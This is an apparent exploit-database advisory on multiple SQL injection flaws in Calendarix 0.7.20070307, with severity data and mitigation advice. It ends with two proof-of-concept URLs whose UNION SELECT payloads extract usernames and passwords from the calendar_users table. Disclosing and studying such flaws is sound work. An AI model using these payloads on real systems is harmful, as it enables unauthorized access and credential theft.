Multiple SQL Injection Vulnerabilities in Calendarix

vendor:

Calendarix

by:

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Calendarix

Affected Version From: 0.7.20070307

Affected Version To: 0.7.20070307

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Multiple SQL Injection Vulnerabilities in Calendarix

The Calendarix application is prone to multiple SQL-injection vulnerabilities. These vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data before using it in SQL queries. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input before using it in SQL queries. Additionally, the application should use parameterized queries or prepared statements to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24633/info

Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

These issues affect Calendarix 0.7.20070307; other versions may also be affected. 

http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23

http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23